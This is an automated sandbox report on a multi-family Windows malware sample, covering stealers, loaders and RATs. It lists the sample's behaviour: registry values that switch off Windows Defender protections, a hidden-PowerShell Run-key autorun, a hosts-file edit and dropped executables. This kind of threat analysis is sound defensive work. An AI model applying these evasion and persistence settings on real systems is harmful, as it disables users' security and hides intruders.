Malware Analysis Report

2025-08-05 16:12

Sample ID 231026-ky4txafd31
Target db7da9a9f7e5b436a0d7a82413ad95364c07378989267218e9bab7b9b71e6716
SHA256 db7da9a9f7e5b436a0d7a82413ad95364c07378989267218e9bab7b9b71e6716
Tags amadey dcrat glupteba raccoon redline smokeloader zgrat 6a6a005b9aa778f606280c5fa24ae595 grome kinza up3 backdoor discovery dropper evasion infostealer loader persistence rat stealer trojan
Score 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score: 10/10

SHA256: db7da9a9f7e5b436a0d7a82413ad95364c07378989267218e9bab7b9b71e6716

Threat Level: Known bad

The file db7da9a9f7e5b436a0d7a82413ad95364c07378989267218e9bab7b9b71e6716 was found to be: Known bad.

Malicious Activity Summary

Detect ZGRat V1

Glupteba payload

Glupteba

RedLine payload

DcRat

RedLine

Raccoon

Suspicious use of NtCreateUserProcessOtherParentProcess

SmokeLoader

ZGRat

Raccoon Stealer payload

Amadey

Modifies Windows Defender Real-time Protection settings

Drops file in Drivers directory

Downloads MZ/PE file

Stops running service(s)

Modifies Windows Firewall

Checks computer location settings

Windows security modification

Executes dropped EXE

Loads dropped DLL

Checks installed software on the system

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in Program Files directory

Launches sc.exe

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Checks SCSI registry key(s)

Modifies data under HKEY_USERS

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Enumerates system info in registry

Uses Task Scheduler COM API

Creates scheduled task(s)

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2023-10-26 09:01

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2023-10-26 09:01

Reported: 2023-10-26 09:04

Platform: win10v2004-20231023-en

Max time kernel: 112s

Max time network: 153s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\A298.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\A298.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\A298.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\A298.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\A298.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\A298.exe N/A

Raccoon

stealer raccoon

Raccoon Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Modifies Windows Firewall

evasion

Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\A345.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9EEB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A053.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A1EB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vF0Yw6Gv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JD7oZ9jo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A345.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Yi0Qu7Ko.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A4DC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dT9yG7Sf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Rs37xE9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C7D7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2MK152qh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FEE7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2MK152qh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Program Files (x86)\Drive Tools\zDriveTools.exe N/A
N/A N/A C:\Program Files (x86)\Drive Tools\zDriveTools.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\98E6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Windows security modification

evasion trojan

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\A298.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\A298.exe N/A

Adds Run key to start application

persistence

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JD7oZ9jo.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Yi0Qu7Ko.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dT9yG7Sf.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\C7D7.exe'\"" C:\Users\Admin\AppData\Local\Temp\C7D7.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\9EEB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vF0Yw6Gv.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Drive Tools\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File opened for modification C:\Program Files (x86)\Drive Tools\zDriveTools.exe C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-QHIS9.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-92N1I.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-346PL.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-NHV86.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-UDRBQ.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-35863.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-TJOHU.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-Q39LK.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\Lang\is-3MU64.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-K1T3V.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-KVQLA.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-KNKI9.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-2JNJ9.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-J503B.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-7415O.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-UGRQO.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-9MS75.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-1D08O.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File created C:\Program Files (x86)\Drive Tools\is-SNUM9.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-FOIIJ.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-F63PC.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune C:\Users\Admin\AppData\Local\Temp\A4DC.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Creates scheduled task(s)

persistence

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
